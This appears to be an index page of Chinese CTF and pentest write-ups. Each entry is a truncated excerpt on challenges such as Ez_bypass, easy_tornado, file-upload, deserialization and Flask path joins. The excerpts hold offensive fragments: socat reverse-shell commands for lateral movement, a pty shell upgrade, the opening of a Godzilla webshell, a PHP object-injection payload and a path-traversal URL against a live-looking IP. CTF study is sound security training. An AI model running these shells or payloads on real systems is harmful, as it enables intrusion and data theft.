[MRCTF2020]Ez_bypass
12345678910111213141516171819202122232425262728293031323334353637383940I put something in F12 for youinclude 'flag.php';$flag='MRCTF...
[护网杯 2018]easy_tornado
123/flag.txt/welcome.txt/hints.txt 一进来就显示了三个文件链接,逐个点击可以看到这些信息 12345678/flag.txtflag in /fllllllllllllag/welcome.txtrender/hints.txtmd5(cookie_secr...
[MRCTF2020]你传你🐎呢
进来是一个文件上传点 123456POST /upload.php HTTP/1.1------WebKitFormBoundarycHfyDys9w8AAZN6lContent-Disposition: form-data; name="uploaded"; filena...
内网横向
优化shell1python -c 'import pty; pty.spawn("/bin/bash")' 12345# 在攻击机监听socat file:`tty`,raw,echo=0 tcp-listen:4444# 在目标机反向连接socat...
bestphp's revenge
123456789101112 <?phphighlight_file(__FILE__);$b = 'implode';call_user_func($_GET['f'], $_POST);session_start();if (isset($_...
godzilla
12345678910111213141516171819<?php@error_reporting(0);session_start();$pass="pass";$key="3c6e0b8a9c15224a";function enc($dat...
DNS 便签
udp流中有查询记录,按前面的序号排好可以组成 1jbbvirt3mrxhgx3upb2f6y3iovxgw427nzswkzc7onxxe5d5 base32解码
tequila
反序列化很明显 superman->AT->mjh->mrcloud->wubin->__invoke 1?payload=O%3A8%3A%22superman%22%3A1%3A%7Bs%3A6%3A%22master%22%3BO%3A2%3A%22AT%2...
babyphp
123456789101112131415<div class="question"> <span>1169608</span> <span class="operator">+</spa...
ezphp
这题解法很多,两个类就行了,KSEC_CTF_2026用S解析绕过,exp: 1234567891011121314151617181920212223242526272829303132333435363738394041424344 <?phpclass GateKeeper...
Anaconda
直接登录 发现file_path传参 有文件读取漏洞 1http://8.154.22.32:20089/upload?file_path=../app.py 123456789101112131415161718192021222324252627282930313233343536...
php命令执行
系统命令执行函数exec,shell_exec,system,passthru,``,pcntl_exec 123456789<?php// 指定可执行程序绝对路径$path = '/bin/ls';// 传递参数数组$args = ['-l...
Flask
123456os.path.join()函数存在绝对路径拼接漏洞os.path.join(path,*paths)函数用于将多个文件路径连接成一个组合的路径。第一个函数通常包含了基础路径,而之后的每个参数被当作组件拼接到基础路径之后如果拼接的某个路径以 / 开头,那么包括基础路径在内的所有前缀...
php反序列化
通过恶意修改对象属性,造成漏洞利用或命令执行 php反序列化在请求头传序列化字符串可以url编码,不然有时候会被’;’分割成不完整 魔术方法1234567891011121314__construct:创建对象最先调用__destruct:对象被销毁调用__clone:使用clone复制对象时...
